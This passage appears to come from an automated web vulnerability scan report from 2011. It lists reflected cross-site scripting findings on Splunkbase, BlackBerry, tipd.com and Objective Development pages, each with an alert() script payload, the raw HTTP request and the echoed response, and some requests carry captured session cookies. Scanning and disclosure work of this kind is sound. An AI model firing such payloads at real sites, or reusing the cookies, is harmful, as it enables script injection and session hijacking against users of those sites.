GET /apps/All/4.x5d256"><script>alert(1)</script>57ae3520054/ HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 23:02:08 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 4529 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web3 ...[SNIP]... <a href="/account:login/?return_to=/apps/All/4.x5d256"><script>alert(1)</script>57ae3520054/"> ...[SNIP]...
4.169. http://splunkbase.splunk.com/apps/All/4.x/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://splunkbase.splunk.com
Path: /apps/All/4.x/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbfd"><script>alert(1)</script>9cc5ed5b283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apps/All/4.x/?8bbfd"><script>alert(1)</script>9cc5ed5b283=1 HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:34 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web1 ...[SNIP]... <a href="/account:login/?return_to=/apps/All/4.x/?8bbfd"><script>alert(1)</script>9cc5ed5b283=1"> ...[SNIP]...
The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 160b5"><script>alert(1)</script>8289440e214 was submitted in the sort parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apps/All/4.x/?sort=downloads160b5"><script>alert(1)</script>8289440e214 HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:00:01 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web1 ...[SNIP]... <a href="/account:login/?return_to=/apps/All/4.x/?sort=downloads160b5"><script>alert(1)</script>8289440e214"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2bc"><script>alert(1)</script>37431b8030e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae785"><script>alert(1)</script>c27293a75ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf5e"><script>alert(1)</script>4dc15f8bb0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd91"><script>alert(1)</script>613c0e86185 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5f2"><script>alert(1)</script>5b2a9f4689f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c02d"><script>alert(1)</script>545b7bade52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976f3"><script>alert(1)</script>920e718ec47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a383a"><script>alert(1)</script>3669f449178 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b609f"><script>alert(1)</script>aa589454ef5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 23:01:55 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ssoj=1 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 4936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web2 ...[SNIP]... <a href="/account:login/?return_to=/static/js/splunkbase.jsb609f"><script>alert(1)</script>aa589454ef5"> ...[SNIP]...
4.180. http://tipd.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://tipd.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6785a"><script>alert(1)</script>ea5c679a90c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?6785a"><script>alert(1)</script>ea5c679a90c=1 HTTP/1.1 Host: tipd.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94178"><script>alert(1)</script>d0d62204af5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /eng/devices/94178"><script>alert(1)</script>d0d62204af5 HTTP/1.1 Host: us.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Pragma: no-cache Content-Type: text/html;charset=UTF-8 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 05 Feb 2011 22:39:03 GMT Date: Sat, 05 Feb 2011 22:39:03 GMT Content-Length: 22981 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7d227'><script>alert(1)</script>33ee9042bc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products7d227'><script>alert(1)</script>33ee9042bc9/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:44 GMT Vary: Accept-Encoding Content-Length: 4055 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f551b'><script>alert(1)</script>12a83f74717 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitchf551b'><script>alert(1)</script>12a83f74717/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:44 GMT Vary: Accept-Encoding Content-Length: 4055 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaa43'-alert(1)-'b0503c02c98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))<aaa43'-alert(1)-'b0503c02c98/script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 4025 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fb55'><script>alert(1)</script>ff7442838a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/8fb55'><script>alert(1)</script>ff7442838a6/script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3925 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d37b6(a)1b76ab0a2c2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))<d37b6(a)1b76ab0a2c2/script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 4007 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b5184(a)c1c1c8d7cc3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</b5184(a)c1c1c8d7cc3 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:48 GMT Vary: Accept-Encoding Content-Length: 3971 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46e98'-alert(1)-'64f6e4907a0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</46e98'-alert(1)-'64f6e4907a0 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:48 GMT Vary: Accept-Encoding Content-Length: 3989 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d354f<script>alert(1)</script>b91a43a6580 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</script>aa4542fda85d354f<script>alert(1)</script>b91a43a6580 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:49 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:49 GMT Vary: Accept-Encoding Content-Length: 4051 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fa328<script>alert(1)</script>66fb205d706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</script>aa4542fda85?fa328<script>alert(1)</script>66fb205d706=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:43 GMT Vary: Accept-Encoding Content-Length: 4057 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17445'><script>alert(1)</script>0881d7f8c81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products17445'><script>alert(1)</script>0881d7f8c81/littlesnitch/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3913 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71a73'><script>alert(1)</script>5d20f71e910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch71a73'><script>alert(1)</script>5d20f71e910/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 3913 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9134b'><script>alert(1)</script>94a64c89046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/index.html9134b'><script>alert(1)</script>94a64c89046 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:47 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:47 GMT Vary: Accept-Encoding Content-Length: 3907 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.324. http://www.obdev.at/products/littlesnitch/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.obdev.at
Path: /products/littlesnitch/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6aa85'><script>alert(1)</script>881a3da76c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/index.html?6aa85'><script>alert(1)</script>881a3da76c9=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 10370
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Little Snitch</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a066'><script>alert(1)</script>128ea21a6f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products7a066'><script>alert(1)</script>128ea21a6f2/pebbles/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3903 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 692ca'><script>alert(1)</script>ac693856ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/pebbles692ca'><script>alert(1)</script>ac693856ed/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3901 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 715b6'><script>alert(1)</script>8614b924e9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/pebbles/index.html715b6'><script>alert(1)</script>8614b924e9e HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
